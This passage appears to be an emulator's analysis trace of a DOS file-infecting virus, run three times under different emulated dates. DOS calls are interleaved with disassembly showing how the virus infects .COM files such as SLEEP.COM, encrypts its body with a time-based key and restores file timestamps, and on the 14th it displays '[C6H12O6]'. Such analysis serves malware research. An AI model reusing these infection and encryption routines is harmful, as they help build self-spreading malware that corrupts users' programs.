0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.794458644Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.800363446Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.807955968Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.815061614Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.816629674Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.825977851Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.828501603Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.831485213Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.833690283Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277937659Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280502236Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.288491297Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.291846074Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.298461001Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.304892098Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.306461056Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.309523447Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.310860403Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.313591683Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.316731415Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.319263457Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.320719908Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.329077036Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.331964441Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.339303227Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.347502631Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.349162434Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.352052878Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.354225622Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.357203746Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.359393909Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.36277065Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.36504119Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.372590715Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.376226762Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.382860553Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.389352526Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.390670996Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.39352324Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.394943329Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.397670345Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.400456859Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.403172951Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.404752486Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.412459017Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.416011069Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.422771029Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.430210214Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.431899767Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.434805439Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.437285859Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.440239717Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.443199986Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.446812688Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.448359011Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.455705949Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.459540179Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.466643874Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.473266215Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.475758289Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.478987105Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.480693588Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.484492325Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.487917484Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.496045073Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.498060145Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.506736422Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.509622841Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.516318995Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.524461461Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.526150137Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.529061575Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.531939801Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.534902154Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.537425462Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.541426357Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.54323447Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.550629288Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.553979282Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.561395198Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.564269683Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.566952479Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.574469454Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.577101836Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.58033086Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.80296017Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.806324358Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.812335627Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.818732208Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.825402498Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.827415335Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.829935933Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.831959569Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.834600617Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.836659859Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277959232Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280097944Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287674746Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.291054739Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.298702073Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.305602606Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.307553177Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.311811352Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.313537004Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.316584587Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.320088625Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.322729372Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.324180815Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.332165966Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.33626694Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.343078055Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.350698621Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.352515354Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.355450222Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.357135679Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.362203779Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.364489006Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.367445994Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.370669869Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.378049859Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.380590017Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.38787816Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.394584746Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.39655746Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.399939038Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.401558313Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.404383288Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.407548443Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.410646949Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.412326488Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.419911616Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.423580287Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.430902277Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.437356402Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.439539104Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.442408342Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.444067972Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.447346569Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.44945341Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.452122274Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.454290228Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.461415669Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.463851541Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.471023414Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.477730435Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.47943499Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.483787754Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.485654517Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.488818198Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.492216423Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.501202002Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.503014438Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.511642892Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.514665099Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.521281795Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.528463923Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.530185792Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.533002445Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.535532312Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.538260515Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.540461076Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.543281089Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.545303496Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.55339886Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.556097103Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.563288337Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.566191977Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.568145545Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.576555614Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.57930176Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.581733025Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:51.484696703Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T13:06:51.487698969Z 78 PC: 12a9b | Find first file
2018-12-25T13:06:51.493758308Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:51.500359679Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:06:51.507521445Z 66 PC: 12b0b | Move file pointer
2018-12-25T13:06:51.509103851Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.511852766Z 66 PC: 12b22 | Move file pointer
2018-12-25T13:06:51.514087111Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.516654247Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T13:06:51.519349328Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T13:06:51.532261562Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T13:06:51.5339751Z 62 PC: 12b87 | Close file
2018-12-25T13:06:51.5412177Z 79 PC: 12aaa | Find next file
2018-12-25T13:06:51.543599921Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.549980057Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.556095707Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.557243096Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.565763695Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.567130824Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.569625073Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.572351394Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.57493764Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.576307225Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.585398272Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.588160474Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.59527033Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.602435497Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.610964768Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.613490873Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.615901256Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.618813117Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.621449664Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.62616504Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.627702454Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.635170745Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.638199948Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.644574595Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.65086278Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.652788378Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.655510078Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.656734725Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.659184893Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.661458396Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.664036195Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.6653858Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.680563149Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.683219685Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.689656262Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.696420371Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.697706183Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.700179399Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.710364185Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.713160861Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.715708369Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.719242621Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.721036886Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.728759601Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.734301972Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.741439282Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.747740508Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.749756119Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.753322986Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.754985978Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.758999888Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.761476406Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.769511576Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.772085296Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.779755166Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.782638163Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.79011097Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.796971382Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.798596572Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.802369924Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.803814106Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.805952602Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.808435284Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.810420465Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.811664286Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.81728284Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.819100059Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.826062886Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.829317618Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.830867944Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.837800099Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.840741868Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T13:06:51.843060573Z 9 PC: 12bbf | Display string (String= '[C6H12O6] ')
2018-12-25T13:06:51.845079873Z 76 PC: 12a44 | Terminate with return code (Return code = '36')